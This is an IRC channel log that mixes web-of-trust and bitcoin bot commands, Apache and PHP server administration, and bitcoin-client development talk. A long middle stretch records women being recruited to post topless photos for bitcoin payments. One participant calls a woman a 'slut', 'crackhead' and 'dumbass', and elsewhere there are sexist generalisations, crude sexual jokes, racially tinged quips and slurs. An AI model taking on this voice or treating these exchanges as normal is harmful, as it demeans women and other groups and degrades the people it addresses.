1799467;1523759074;deedbot;L1: 0, L2: 0 by 0 connections. 1799468;1523759080;trinque;gotta use the WoT you fuckin n00bs 1799469;1523759117;ckang;oh 1799470;1523759119;ckang;!!help 1799471;1523759120;deedbot;http://deedbot.org/help.html 1799472;1523759124;ben_vulpes;!!key ascii_lander 1799473;1523759126;deedbot;http://wot.deedbot.org/9AC2C92DC81DF86C575819F93F37D38EAF9EDE6C.asc 1799474;1523759204;ckang;hm 1799475;1523759213;ckang;theres no range of units for rating 1799476;1523759240;ckang;oops, minus 'of units' 1799477;1523759304;phf;ckang: that's by design, no such thing as universal rating system, http://trilema.com/2014/what-the-wot-is-for-how-it-works-and-how-to-use-it/ 1799478;1523759697;ckang;what datatype is that unit in the codebase though ? I mean there has to be some range I would guess? 1799479;1523760085;phf;ckang: i suspect it's an integer 1799480;1523760274;phf;actually, today i learned that it's an (integer -10 10) 1799481;1523760469;BingoBoingo;In your daily truefax, the story of Mary https://imgoat.com/uploads/5b9eea6e1c/104639.jpg 1799482;1523760652;phf;http://btcbase.org/log/2018-04-12#1796907 << i'll be honest, i brought up barks using one of those LAMP guides and barely touched the configs since. it probably was https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-16-04 1799483;1523760652;a111;Logged on 2018-04-12 06:53 ben_vulpes: hanbot must have some special sauce in her mp-wp 1799484;1523760723;phf;i'm not sure if the stack can really be manipulated from first principles. it's an experiental technology, if it says "add onion" you add onion, etc. 1799485;1523762248;douchebag;hey mircea_popescu 1799486;1523762260;douchebag;Some girls are going to be interested 1799487;1523762272;douchebag;u gonna be ready in 20-30 mins or so 1799488;1523762458;phf;sleepless mp nights of generating strings and paying bitcoins for the endless whorde of tits 1799489;1523764075;ascii_lander;oook rockchippen theoretically ready to plug in... 1799490;1523764135;*;ascii_lander to bed, bbl 1799491;1523764315;ben_vulpes;> whorde << nice one phf 1799492;1523764333;ben_vulpes;phf: yeah that's what i determined 1799493;1523764380;ben_vulpes;i'm kinda a little puckered about using the apache worker model; i'm going to have to set up something that lets folks upload content 1799494;1523764413;ben_vulpes;and i don't know enough about what could go wrong to let user b write into user a's directory through some nightmare within apache 1799495;1523764436;ben_vulpes;or or someone has a php app that allows for uploads of stuff and then execution of those uploaded files 1799496;1523764623;ben_vulpes;anyways, i gotta collect numbers on eg nginx php-fpm; apache php-fpm and apache mod_php for publishment; i'm hoping that the proxy slowness i saw a few days ago was the "entirely nonbroken stack" of http://logs.bvulpes.com/trilema?d=2018-4-12#331707 because that at least promises each users php process will be run as that user 1799497;1523764626;mimisbrunnr;Logged on 2018-04-12 06:48 mircea_popescu: anyway ben_vulpes here's where you thank me profusely for having saved you dicking about with entirely nonbroken stacks for an alfternity. 1799498;1523764646;mircea_popescu;in other "overheard in my car", "man hairspray is weird. it feels like i've got cum in my hair." 1799499;1523764662;mircea_popescu;douchebag, aite. 1799500;1523764674;ben_vulpes;i haven't even figured out how to get apache to include a whole directory of vhosts yet 1799501;1523764683;phf;ben_vulpes: i take it you're still trying to multi-host a lamp stack? 1799502;1523764697;phf;or rather multi-user 1799503;1523764719;ben_vulpes;phf: not much trying left; i'm in the weeds of migrating folks .htaccess files to apache 2.4 format from 2.2 1799504;1523764736;mircea_popescu;!!pay ninaz 0.02 1799505;1523764755;deedbot;Get your OTP: http://p.bvulpes.com/pastes/r75Nv/?raw=true 1799506;1523764761;mircea_popescu;ben_vulpes, dood wtf are you talking about, it does it by default and otherwise it's in the config file. 1799507;1523764767;ben_vulpes;but for example pizarro.danielpbarron.com and thewhet.net are both functional, although hanbot's lacks the pretty links for another little while 1799508;1523764768;mircea_popescu;phf, apache doesn't actually work any other way. 1799509;1523764947;ben_vulpes;mircea_popescu: i must be thick, or whoever packaged it for gentoo did some inscrutable 'simplification' as a vanilla apache install over here came with none of the conveniences i expected to see a la a2ensite or sites_enabled/disabled, adding Include /path/to/vhosts.d/*.conf caused serverwide barfage 1799510;1523764996;ben_vulpes;mircea_popescu: i haven't put major time into this particular burr, but it is on my conveyor and i don't expect it to be a major pita or be seen by anyone but me 1799511;1523765113;mircea_popescu;i have never used apache under gentoo, generally most webservers run on centos or else debian straight. 1799512;1523765133;phf;ben_vulpes: you're possibly missing relevant LoadModule commands, if somebody was stripping things down, that's the first place i'd look 1799513;1523765139;mircea_popescu;but i don't even know wtf is /vhosts.d/ 1799514;1523765157;mircea_popescu;what's wrong with /home/username/blabla 1799515;1523765198;mircea_popescu;ah, you're stuck not having more ips than users huh. 1799516;1523765283;mircea_popescu;Include vhosts.d/*.conf should not barf ; however you don't need a "path to", as it already runs from the directory above that, as part of the main config. 1799517;1523765435;ben_vulpes;no i take it back, it's loading everything in vhosts.d 1799518;1523765456;ben_vulpes;thanks for questioning, mircea_popescu 1799519;1523765648;mircea_popescu;yw 1799520;1523765952;mircea_popescu;hanbot / everyone : speaking of patches for mp-wp, here's something i'd dearly love : a MASS uploader. so you don't have to upload files one by one in the webinterface. 1799521;1523765986;mircea_popescu;minimal extension of extant item required. 1799522;1523766110;hanbot;yeah that'd be nice huh. 1799523;1523766132;mircea_popescu;mhm. 1799524;1523766169;*;hanbot has zero js leetpoints but if it can do one, s'gotta do > 1 eh? will look. 1799525;1523766191;mircea_popescu;yes, see how you can get that form to take a range. 1799526;1523766444;mircea_popescu;
<< that item. 1799527;1523766685;mircea_popescu;there, that's another nine of 'em. 1799528;1523767002;mircea_popescu;in other news, record bw burnage on trilema these past 3 days, but srsly what is bw even for. 1799529;1523767104;mircea_popescu;!!rated ckang 1799530;1523767104;deedbot;mircea_popescu rated ckang 2 at 2018/04/12 16:37:51 << diplomatic agent o.O 1799531;1523767148;mircea_popescu;i did rate him! phf he actually got the whole wireguard thing started ; http://btcbase.org/log/2018-04-11#1796038 1799532;1523767148;a111;Logged on 2018-04-11 04:05 ckang: sorta related, but what do you think about this.. https://www.wireguard.com/papers/wireguard-formal-verification.pdf 1799533;1523767324;mircea_popescu;http://btcbase.org/log/2018-04-15#1799493 << this is not how it works. apache runs as "nobody", files get permission of user. if they execute, they execute with user's permission set. 1799534;1523767324;a111;Logged on 2018-04-15 03:53 ben_vulpes: i'm kinda a little puckered about using the apache worker model; i'm going to have to set up something that lets folks upload content 1799535;1523767358;mircea_popescu;("nobody" is an actual concept in this stack of experimential onions technology, yes.) 1799536;1523769162;douchebag;!!up Courtneyxd 1799537;1523769163;deedbot;Courtneyxd voiced for 30 minutes. 1799538;1523769177;Courtneyxd;Who wants to see my boobies 1799539;1523769201;douchebag;mircea_popescu: ^ 1799540;1523769800;douchebag;mircea_popescu: you around? 1799541;1523770111;mircea_popescu;is it me, or did his linecount/tit actually increase ? 1799542;1523770116;mircea_popescu;Courtneyxd, a592c178. half hour. 1799543;1523770206;Courtneyxd;Okay give me a minute 1799544;1523770253;mircea_popescu;literally, half hour. 1799545;1523770253;Courtneyxd;!!register http://p.bvulpes.com/pastes/poxzj/?raw=true 1799546;1523770256;deedbot;9259D37BF9E4A944F4485E91BBF962B502C85769 registered as Courtneyxd. 1799547;1523770565;Courtneyxd;https://i.imgur.com/BWPaPyz.jpg 1799548;1523770627;mircea_popescu;!!pay Courtneyxd 0.02 1799549;1523770645;deedbot;Get your OTP: http://p.bvulpes.com/pastes/wHDSa/?raw=true 1799550;1523770824;Courtneyxd;Thank you!!! 1799551;1523770883;mircea_popescu;soo... what do you do for a living ? 1799552;1523770924;Courtneyxd;hair stylist 1799553;1523770958;mircea_popescu;is it fun ? 1799554;1523770976;mircea_popescu;heh\ 1799555;1523770979;mircea_popescu;!!up Courtneyxd 1799556;1523770979;deedbot;Courtneyxd voiced for 30 minutes. 1799557;1523770981;mircea_popescu;!!up jaxxie 1799558;1523770981;deedbot;jaxxie voiced for 30 minutes. 1799559;1523770987;Courtneyxd;I love it!!! 1799560;1523770988;jaxxie;hi 1799561;1523770992;jaxxie;here 4 pic 1799562;1523771004;mircea_popescu;jaxxie, dc6f7590. you got half hour. 1799563;1523771058;mircea_popescu;Courtneyxd, is it true that gay men are better hairstylists than women ? 1799564;1523771077;Courtneyxd;sometimes 1799565;1523771082;Courtneyxd;i have known few 1799566;1523773772;mircea_popescu;in other news, someone's maintaining a list of all the chans : http://ircgrep.arza.us/list.log 1799567;1523774642;douchebag;!!up Courtneyxd 1799568;1523774643;deedbot;Courtneyxd voiced for 30 minutes. 1799569;1523774691;Courtneyxd;hey 1799570;1523774705;Courtneyxd;I am checking with !!balance and it is not showing 1799571;1523774707;Courtneyxd;0.0 1799572;1523775012;douchebag;!!up BethanyC 1799573;1523775013;deedbot;BethanyC voiced for 30 minutes. 1799574;1523775036;BethanyC;titty pics? 1799575;1523775700;mircea_popescu;Courtneyxd, can take a while. 1799576;1523775720;mircea_popescu;BethanyC, b1f4f729. half hour. 1799577;1523775723;mircea_popescu;!!up roxann3 1799578;1523775723;deedbot;roxann3 voiced for 30 minutes. 1799579;1523775799;BethanyC;can I show my tits for money? 1799580;1523775902;mircea_popescu;yes. did you read up on how this works ? 1799581;1523775941;BethanyC;Yes douchebag is walking me through the process 1799582;1523775971;BethanyC;he is helping me generate the key right now 1799583;1523776104;mircea_popescu;aite then. 1799584;1523776361;BethanyC;ok 1799585;1523776367;BethanyC;whats the code? 1799586;1523776855;douchebag;mircea_popescu: she's ready 1799587;1523776863;douchebag;!!up BethanyC 1799588;1523776865;deedbot;BethanyC voiced for 30 minutes. 1799589;1523776952;mircea_popescu;http://btcbase.org/log/2018-04-15#1799576 1799590;1523776952;a111;Logged on 2018-04-15 07:02 mircea_popescu: BethanyC, b1f4f729. half hour. 1799591;1523776993;BethanyC;okay! 1799592;1523777661;BethanyC;`https://i.imgur.com/EMgnQxk.jpg 1799593;1523777695;douchebag;!!key BethanyC 1799594;1523777696;deedbot;Not registered. 1799595;1523777702;douchebag;let me get her registered 1799596;1523777738;BethanyC;!!register http://p.bvulpes.com/pastes/Ny0pF/?raw=true 1799597;1523777742;deedbot;2623A53EB214FC16F9913BE846BEED2034A6B341 registered as BethanyC. 1799598;1523777743;mircea_popescu;BethanyC, you missed an f. 1799599;1523777844;BethanyC;ill fix that and resend 1799600;1523778669;douchebag;!!up Andria 1799601;1523778670;deedbot;Andria voiced for 30 minutes. 1799602;1523778686;Andria;im here to show my tits 1799603;1523778697;douchebag;mircea_popescu: ^ 1799604;1523778944;mircea_popescu;Andria, 180cd5a3. you got half hour. 1799605;1523778974;Andria;okay! 1799606;1523779881;Andria;https://i.imgur.com/5IhVC85.jpg 1799607;1523779907;douchebag;let me get her registered 1799608;1523779936;mircea_popescu;cool. 1799609;1523779948;mircea_popescu;so what do you do for a living, Andria 1799610;1523779982;Andria;im a prostitute 1799611;1523780017;mircea_popescu;how do you like it ? 1799612;1523780041;Andria;i love sex and it pays well i love being a sex worker 1799613;1523780120;mircea_popescu;hey, more power to you. 1799614;1523780128;Andria;!!register http://p.bvulpes.com/pastes/tPcGv/?raw=true 1799615;1523780133;deedbot;9052D19381CEBFE6005AB5DD43E7205352D2058D registered as Andria. 1799616;1523780161;douchebag;got her registered 1799617;1523780219;mircea_popescu;!!pay Andria 0.02 1799618;1523780238;deedbot;Get your OTP: http://p.bvulpes.com/pastes/A9iR9/?raw=true 1799619;1523781034;mircea_popescu;!!up BethanyC 1799620;1523781035;deedbot;BethanyC voiced for 30 minutes. 1799621;1523781161;douchebag;She said she fixed the code 1799622;1523781171;douchebag;but then sent me the same picture 1799623;1523781183;douchebag;so im tryimg to get a hold of her 1799624;1523781195;douchebag;to tell her she accidently resent the same photo 1799625;1523781316;douchebag;!!up Samanthaaa 1799626;1523781317;deedbot;Samanthaaa voiced for 30 minutes. 1799627;1523781330;Samanthaaa;im here to show my tits 1799628;1523781351;mircea_popescu;Samanthaaa, c8221262. half hour. 1799629;1523781481;Samanthaaa;alright 1799630;1523782167;BethanyC;ok 1799631;1523782199;Samanthaaa;https://i.imgur.com/cs5vSvn.jpg 1799632;1523782303;douchebag;gonna get her pgp setup 1799633;1523782757;mircea_popescu;Samanthaaa, what happened to your head ? 1799634;1523782938;Samanthaaa;what do you mean? 1799635;1523783057;Samanthaaa;!!register http://p.bvulpes.com/pastes/Kkb86/?raw=true 1799636;1523783060;mircea_popescu;you've got something on the right temple ? like side of your head ? 1799637;1523783060;deedbot;C2A903B0DBD573B73626B009A85CD54545572414 registered as Samanthaaa. 1799638;1523783089;Samanthaaa;thats a piece of my hair 1799639;1523783321;douchebag;!!up Samanthaaa 1799640;1523783322;deedbot;Samanthaaa voiced for 30 minutes. 1799641;1523783334;Samanthaaa;is that okay though? 1799642;1523783563;mircea_popescu;yea. 1799643;1523783567;mircea_popescu;!!pay Samanthaaa 0.02 1799644;1523783579;douchebag;!!up Courtneyxd 1799645;1523783580;deedbot;Courtneyxd voiced for 30 minutes. 1799646;1523783586;deedbot;Get your OTP: http://p.bvulpes.com/pastes/OIOhW/?raw=true 1799647;1523783611;Courtneyxd;hey when I do !!balance it is not showing 1799648;1523783674;Courtneyxd;douchebag said it usually only takes 5 to ten minutes but it has been a long while and still nothing xc 1799649;1523783758;mircea_popescu;Courtneyxd, patience is a virtue! 1799650;1523783848;Courtneyxd;okay so I just need to keep waiting 1799651;1523783894;mircea_popescu;yeah don't stress, it'll be there. 1799652;1523784007;Courtneyxd;okay then 1799653;1523784375;douchebag;!!up BethanyC 1799654;1523784376;deedbot;BethanyC voiced for 30 minutes. 1799655;1523784388;BethanyC;https://i.imgur.com/GPnOUXq.jpg 1799656;1523784428;mircea_popescu;i can't read that ;/ 1799657;1523784453;douchebag;she's a crackhead 1799658;1523785073;douchebag;here she's going to retry 1799659;1523785869;douchebag;!!up Hannahcx 1799660;1523785870;deedbot;Hannahcx voiced for 30 minutes. 1799661;1523785882;Hannahcx;I have tits ^.^ 1799662;1523785895;douchebag;mircea_popescu: ^ 1799663;1523786432;douchebag;!!up BethanyC 1799664;1523786433;deedbot;BethanyC voiced for 30 minutes. 1799665;1523786455;Hannahcx;https://i.imgur.com/hkVOdKH.jpg 1799666;1523786476;douchebag;wrong window dumbass 1799667;1523786504;BethanyC;https://i.imgur.com/hkVOdKH.jpg 1799668;1523786526;douchebag;about damn time 1799669;1523786892;douchebag;mircea_popescu: I got this slut to do it the right way finally 1799670;1523792891;douchebag;mircea_popescu: You around 1799671;1523793765;ascii_lander;!Q later tell BingoBoingo plox to gpggram the coords , i fell asleep before writing'em down and lost. presently off to breakfast, then will look. 1799672;1523793766;lobbesbot;ascii_lander: The operation succeeded. 1799673;1523794294;BingoBoingo;!Q later tell ascii_lander http://p.bvulpes.com/pastes/49SyH/?raw=true 1799674;1523794294;lobbesbot;BingoBoingo: The operation succeeded. 1799675;1523794295;lobbesbot;BingoBoingo: Sent 8 minutes ago: plox to gpggram the coords , i fell asleep before writing'em down and lost. presently off to breakfast, then will look. 1799676;1523802833;deedbot;http://danielpbarron.com/2018/male-chauvinist/ << Daniel P. Barron - Male Chauvinist 1799677;1523807084;danielpbarron;http://btcbase.org/log/2018-04-15#1799329 << he's available now for a few hours; otherwise, another day 1799678;1523807084;a111;Logged on 2018-04-15 00:09 mircea_popescu: in other news : darwin fish, of fabled atruechurch group, agreed to do a q/a session for a coupla hours tomorrow / next week sometime. 1799679;1523807085;lobbesbot;danielpbarron: Sent 15 hours and 3 minutes ago: You have a comment in cue 1799680;1523807657;douchebag;mp is on? 1799681;1523807707;danielpbarron;not yet 1799682;1523807717;douchebag;ah 1799683;1523817855;hanbot;http://btcbase.org/log/2018-04-15#1799616 look douchebag, for every girl you bring in here there's like 10+ lines of bs from you. i've got nothing against you personally, but you're littering the logs with noise --it's annoying as fuck, and if you keep at it i'll end up negrating you. 1799684;1523817855;a111;Logged on 2018-04-15 08:16 douchebag: got her registered 1799685;1523818169;mod6;jesus christ, 1 foot of snow in the last 24 hours, and it isn't even stopping. 1799686;1523819809;douchebag;hanbot: what do you mean 10 lines of bs 1799687;1523820047;hanbot;look at the log where i linked it, for example. the girl registers, the bot confirms she's registered, ---you announce that you got her registered---. a few lines down you've got four lines to announce that there's a problem with a picture, after the picture's been posted. how many times yesterday did you ping mircea_popescu and then do it ---again--- to ask if he's around? etc. 1799688;1523820478;hanbot;i get that most irc channels and chat venues in general encourage this constant stream of self-evident, redundant, low-content chatter, but #trilema doesn't come close to most. there are people trying to communicate and get shit done here, and while you and your titprovisioning are quite welcome, the noise overhead is not. 1799689;1523820488;hanbot;!#s snr 1799690;1523820488;a111;100 results for "snr", http://btcbase.org/log-search?q=snr 1799691;1523820503;hanbot;^ see also. make sense? 1799692;1523820542;douchebag;hanbot: I only asked because someone joined as mircea_popescu but I wasn't sure if it was really him due to his name getting switched to guest. I'll be less noisy when bringing women in here. 1799693;1523820624;hanbot;cool 1799694;1523825453;ben_vulpes;hardfork hijinks https://github.com/5chdn/EIPs/blob/a5-eip-999/EIPS/eip-999.md 1799695;1523829347;esthlos;Trying to set up mp-wp on php-mysql interaction. Can anyone help me proceed? http://p.bvulpes.com/pastes/HMc6z/?raw=true 1799696;1523829380;esthlos;Specifically, my php sees mysqli my no mysql. Maybe I need to downgrade? 1799697;1523831113;phf;esthlos: mysqli appears to be a force pushed buggy replacement for original php mysql driver (the usual "deprecated!!1" tricks, while missing features and introducing creative bugs) 1799698;1523831150;phf;but, on debian at least, php5-mysql comes with both mysql.so and mysqli.so 1799699;1523831270;phf;so you might just be using some kind of "modern" distribution, that forces modern extensions on you. downgrade with extreme prejudice advised. 1799700;1523831307;esthlos;yes, it's the latest gentoo nonsense. 1799701;1523831518;esthlos;there's not even a mysql use flag, just mysqli and PDO 1799702;1523831538;esthlos;(for php) 1799703;1523831743;ben_vulpes;esthlos: i see mysql and msqli flags for dev-lang/php-7.1.15 and just the mysql flag for dev-lang/php-5.6.34 1799704;1523831811;esthlos;ben_vulpes: are you sure you're not misreading the mssql flag? https://packages.gentoo.org/packages/dev-lang/php 1799705;1523831918;esthlos;ah you're right, it's a recent removal 1799706;1523831924;ben_vulpes;esthlos: 7.1.15 has mssql in addition! http://p.bvulpes.com/pastes/OxsNy/?raw=true 1799707;1523832030;esthlos;double backtrack: the packages.gentoo website is just retarded: https://gitweb.gentoo.org/repo/gentoo.git/tree/dev-lang/php/php-7.2.4.ebuild 1799708;1523842827;BingoBoingo;So, I don't want to spoil alf adventures in Uruguay, but... He loves the cheese here 1799709;1523842908;BingoBoingo;And the Rockchips, kinda look like art... 1799710;1523843966;ben_vulpes;piiiiics 1799711;1523844071;BingoBoingo;In not so much time, all will be revealed 1799712;1523844187;BingoBoingo;Alf spent roughly the entire day looking through his camera. Often at other cameras 1799713;1523844482;BingoBoingo;Long time no see 1799714;1523844489;BingoBoingo;Sup mats 1799715;1523844564;mats;nm, been following along in my voice absence 1799716;1523844598;BingoBoingo;Want to fly to Uruguay, drop off some boxes? 1799717;1523844689;mats;sounds like a task for a lord 1799718;1523844878;mats;i have four fgs if pizarro needs a few more though 1799719;1523850959;hanbot; module 1799720;1523850975;hanbot;heh. 1799721;1523873043;spyked;http://btcbase.org/log/2018-04-14#1799116 <-- no "pre-existing $thing" was contemplated at any point. lemme exemplify: a. you wanna implement bitcoin-node-os and determine that it requires crypto primitives, bitcoin db/fs, text editor for config files and so on up to a set of components C and *nothing else*; b. you audit the system at [a] and find out that idem, all components present in the systems are in C, and if not, then out the 1799722;1523873043;a111;Logged on 2018-04-14 21:12 mircea_popescu: http://btcbase.org/log/2018-04-14#1799018 << the notion that there's such a thing or could be such a thing as "resonable expectation" of pre-existing userland on the basis of os is not unlike young women expecting fucking them means they get to reorganize your bathroom. 1799723;1523873049;spyked;window with the box or whatever. that C is the set through which you intentionally make your OS a non-general-purpose item. 1799724;1523873127;spyked;then moving from this approach you can systematically eliminate e.g. "pdf library" or e.g. "udev" or e.g. "protected mode" or everything else that is not *needed* for the system, not just userland (if there should be anything such as "a userland" at all in there) 1799725;1523873213;spyked;i.e. whitelisting instead of the current blacklist-based approach used in e.g. portage, as seen in http://btcbase.org/log/2018-04-15#1799700 , http://btcbase.org/log/2018-04-11#1796255 , http://btcbase.org/log/2018-04-06#1793781 and many others in the logs 1799726;1523873213;a111;Logged on 2018-04-15 22:28 esthlos: yes, it's the latest gentoo nonsense. 1799727;1523873213;a111;Logged on 2018-04-11 15:29 asciilifeform: speaking of which, apparently AS OF TODAY gentoo portage latest ver DEMANDS gpg2. 1799728;1523873213;a111;Logged on 2018-04-06 23:57 asciilifeform: aaaand apparently emacs 25.3.r4 pulls in... gnutls 1799729;1523873639;spyked;http://btcbase.org/log/2018-04-14#1799145 <-- I agree. there are e.g. "pull" games sponsored through kickstarter that made decent products, ( http://thetarpit.org/posts/y03/060-thimbleweed-park.html workedforme), and I'm sure part of academic grant proposals are srs bsns. and this might even work for wireguard, seeing as how it has the great advantage of being actual existing item, used by people. 1799730;1523873639;a111;Logged on 2018-04-14 21:22 mircea_popescu: http://btcbase.org/log/2018-04-14#1799029 << anyway, i wouldn't simplify it quite to that point. obviously there's a pull and there's a push way to make money, and if i propose to some guy, "do x, get y" it's my push not his pull, and obviously if he wants to pull instead of waiting to b pushed aroundhe gotta do pull-y sorta things. but anyways. 1799731;1523879049;deedbot;http://thetarpit.org/posts/y04/06e-sieranevada-cuibul-de-viespi.html << The Tar Pit - Two on the parastas: Sieranevada and Cuibul de viespi 1799732;1523882142;BingoBoingo;!Q later tell ascii_lander http://wotpaste.cascadianhacker.com/pastes/rSTjv/?raw=true 1799733;1523882142;lobbesbot;BingoBoingo: The operation succeeded. 1799734;1523884915;ascii_lander;BingoBoingo: i've been awake for a while 1799735;1523884916;lobbesbot;ascii_lander: Sent 1 day, 1 hour, and 10 minutes ago: http://p.bvulpes.com/pastes/49SyH/?raw=true 1799736;1523884917;lobbesbot;ascii_lander: Sent 46 minutes ago: http://wotpaste.cascadianhacker.com/pastes/rSTjv/?raw=true 1799737;1523885784;ascii_lander;BingoBoingo: sitting here in hotel currently, fiddling with kvm 1799738;1523886951;BingoBoingo;[dark African Thumbs-up] 1799739;1523887172;mod6;mornin' 1799740;1523887414;danielpbarron;lol BingoBoingo 1799741;1523887458;BingoBoingo;[medium brown, but dot-injun as opposed to African surgeon] 1799742;1523887561;danielpbarron;got a message from my former employer that they "Have a service" and were notified of my blog post. hows that for seo? i'm not even trying to game the search 1799743;1523887579;BingoBoingo;lol 1799744;1523888195;mircea_popescu;good morning republicans! 1799745;1523888273;mircea_popescu;http://btcbase.org/log/2018-04-15#1799677 << aw sorry about that. this week then. 1799746;1523888273;a111;Logged on 2018-04-15 15:44 danielpbarron: http://btcbase.org/log/2018-04-15#1799329 << he's available now for a few hours; otherwise, another day 1799747;1523888328;ascii_lander;ohai mircea_popescu 1799748;1523888348;mircea_popescu;incidentally trinque : i figure http://trilema.com/2018/the-rivers-of-blood-article-or-the-lordship-list-fifth-year/ is ready for application. 1799749;1523888354;mircea_popescu;my my check out my kickass header today! 1799750;1523888361;mircea_popescu;hola ascii_lander . how's miniargentina ? 1799751;1523888382;ascii_lander;it's riotously fun. 1799752;1523888423;mircea_popescu;you're so funny, you know, spend a whole year all dour and then go out for like a week and be all "squeeee" 1799753;1523888428;mircea_popescu;fucking move already, it's allowed. 1799754;1523888430;ascii_lander;and i'm beginning to suspect that they moved the real argentina here 1799755;1523888441;ascii_lander;and the ~other~ one is its ukraine, not vice-versa 1799756;1523888445;mircea_popescu;well, it's sealed, but the seals are made in tiera de lfuego. leak lots. 1799757;1523888449;mircea_popescu;like the submarine's. 1799758;1523888452;ascii_lander;lol! 1799759;1523888533;mircea_popescu;http://btcbase.org/log/2018-04-15#1799685 << turkey time!!1 1799760;1523888533;a111;Logged on 2018-04-15 18:49 mod6: jesus christ, 1 foot of snow in the last 24 hours, and it isn't even stopping. 1799761;1523888557;mod6;it was /bad/, got like 15" total. 1799762;1523888567;ascii_lander;even such fabled items as BingoBoingo's hostel, are not quite what i expected. there's moar sunlight, walkable space, etc there, than in my house! 1799763;1523888582;ascii_lander;plus gurls apparently 1799764;1523888608;ascii_lander;( what i expected, of course, was flearidden dank cellar of some 19th c imagination ) 1799765;1523888628;mircea_popescu;http://btcbase.org/log/2018-04-15#1799697 << it is, EXACTLY that. 1799766;1523888628;a111;Logged on 2018-04-15 22:25 phf: esthlos: mysqli appears to be a force pushed buggy replacement for original php mysql driver (the usual "deprecated!!1" tricks, while missing features and introducing creative bugs) 1799767;1523888651;mircea_popescu;mod6, wow. did you have to shovel all that ? 1799768;1523888672;mircea_popescu;ascii_lander, aha. i r unsurprist. 1799769;1523888693;ascii_lander;also interestingly , BB looked much healthier than in his early pic, he has physique of cosmonaut now, from living here 1799770;1523888705;mod6;mircea_popescu: no, thankfully. I'd probably have died. I have a mean-snowblower. 1799771;1523888717;mod6;iirc posted a pic once upon a time even. 1799772;1523888753;mod6;Was that heavy-wet snow, very difficult to manage without blower/plow. 1799773;1523888760;mircea_popescu;phf, there's been this ancient grudge between "mysql people" and "php people" in the following sense : in the 90s, the "foss community" consisted of a sad indeology-lite republic that still had enough people to get shit done. they needed an egine for their "revolution" which was to be centered around "the web", a shoddy, ill conceived can of mostly "make it easy for people to participate AND IT WILL TAKE OVER THE WORLD [of pe 1799774;1523888760;mircea_popescu;ople who need it to be easy to participate]". 1799775;1523888763;*;ascii_lander is prolly the least in-shape d00d in this whole city atm 1799776;1523888770;mod6;Typically we don't get blizzards in april. 1799777;1523888791;mircea_popescu;but then their successors, two groups of dweebs with sparse goatees, really REALLY don't believe they're just gunk on ancients' unremarkable cogs in a larger system. 1799778;1523888851;mircea_popescu;as there's not enough room in reality for both their larpings, they eventually split, there's a useless "new" php without mysql and a similarily useless "new" mysql withouyt php now. that neitjher were ANYTHING other than "one piece of LAMP, which exists STRICTLY because tmsr v 0.1 says it does" entirely wooshes over all their herads. 1799779;1523888869;mircea_popescu;ascii_lander, so get crackin'!1 1799780;1523888943;ascii_lander;about to move 100kg of crate, heh 1799781;1523888945;mircea_popescu;http://btcbase.org/log/2018-04-15#1799694 << im not gonna read that, not just because github is on the dark web, but also because jesus christ the livejournal. if anyone wants to summarize... 1799782;1523888945;a111;Logged on 2018-04-15 20:50 ben_vulpes: hardfork hijinks https://github.com/5chdn/EIPs/blob/a5-eip-999/EIPS/eip-999.md 1799783;1523888980;ascii_lander;mircea_popescu: i read it, it was a snoar, ethertards doing their 'unhappen this eggog, unlose some shitcoin' thing again. 1799784;1523888992;mircea_popescu;heh 1799785;1523889013;mod6;smh 1799786;1523889019;mod6;mega-unsurprise 1799787;1523889022;mircea_popescu;such a credible effort, that shitpile. imo ethereum is very useful in the following sense : it shows EXACTLY what bitcoin'd have been like if it occured to the ustards. 1799788;1523889055;mircea_popescu;sorta like a taj mahal made out of pet bottles in the approximate shape of clinton's nose. 1799789;1523889086;mircea_popescu;"so in which sense is it a taj mahal then ?" "they say so. that gotta count for something, beyond any consideration of form or substance" "notrly" "TERRORIST!" 1799790;1523889099;mod6;lol 1799791;1523889192;mircea_popescu;http://btcbase.org/log/2018-04-16#1799708 << it wasn;t bad. i hope he's treating you to the expensive stuff. 1799792;1523889192;a111;Logged on 2018-04-16 01:40 BingoBoingo: So, I don't want to spoil alf adventures in Uruguay, but... He loves the cheese here 1799793;1523889250;mod6;In other tales from the TRB: I spent a solid chunk of time this weekend trying to backport all of the rpc rawtx functions from upstream prb. Just to see if it was workable, and an educational endevour. This is not going to be a thing. They change tons of baseclasses and introduce a variety of new ones. Going forward, I think these will just be reimplmented in a trb-fashion. 1799794;1523889253;mircea_popescu;http://btcbase.org/log/2018-04-16#1799719 <<< ahahahaha. what is this, like the bzzzzzt--rppppptkkkchhh of 2018 ? 1799795;1523889253;a111;Logged on 2018-04-16 03:55 hanbot: module 1799796;1523889255;ascii_lander;errything courtesy of ascii_lander's bag o' orcbux , while i'm here, aha 1799797;1523889282;mircea_popescu;mod6, a reimplementation was always the idea, yeh. 1799798;1523889293;mod6;Of course, we have other tasks such as re-doing wallet, how we dump all keys from wallet, and others. Just thought I'd venture in and see what was what. 1799799;1523889300;ascii_lander;mod6: i tried to do this at one point, ended up burning it all in disgust, and wrote shiva ( which then i sadly abandoned for reasons amply discussed in log ) 1799800;1523889313;mod6;aha. 1799801;1523889321;mircea_popescu;mod6, i could have saved you the time, i guess, but then again IF you publish a detailed discussion then we have that. 1799802;1523889332;mod6;Just sayin', wasn't waste of time for me to do it, just thought I'd report my findings. 1799803;1523889336;mircea_popescu;understand the important point here : such marches in the desert are ONLY useful if well documented. 1799804;1523889345;mircea_popescu;if you just keep the results in your skull, it's better to not go. 1799805;1523889352;ascii_lander;mod6: it really doesn't hurt to 'piss on the electric fence yourself' and see what i meant. 1799806;1523889356;ascii_lander;so not wasted time. 1799807;1523889376;ascii_lander;but mircea_popescu is entirely right, gotta document 1799808;1523889392;mod6;fair enough. 1799809;1523889395;mod6;bbs. 1799810;1523889396;mircea_popescu;and more generally : there's two kinds of sallies a gentleman may engage in. the one is where he comes back with a boatload of gold/tomatoes/whatever. the other is where he comes bacl with a well written tale of his travels. 1799811;1523889410;mircea_popescu;the one where he has a lot of fun / sees a lot of things / is all impressed / tastes all the tomatoes IS NOT useful. 1799812;1523889442;mircea_popescu;so, if your desert march results in a jewel of code, a la ffa, sure. if your desert march results in ample "lulz" as we call them, ie, intricate, unforgiving documentation of orcs' idiocy, sure. 1799813;1523889455;mircea_popescu;but those are the two and the only two ways to bring back loot for your trouble. 1799814;1523889551;*;ascii_lander was just nao having a quite mircea_popescuine 'as above, so below' thought : in usa, hotel maids are invariably bags, in ~every~ orcistan -- pretty gurlz 1799815;1523889570;ascii_lander;and the reason, i suspect, is that in usa the young gurlz are trying to 'become clitler' 1799816;1523889584;ascii_lander;and wouldn't be caught dead changing beds in hotel 1799817;1523889673;mircea_popescu;well, hunger. the usa 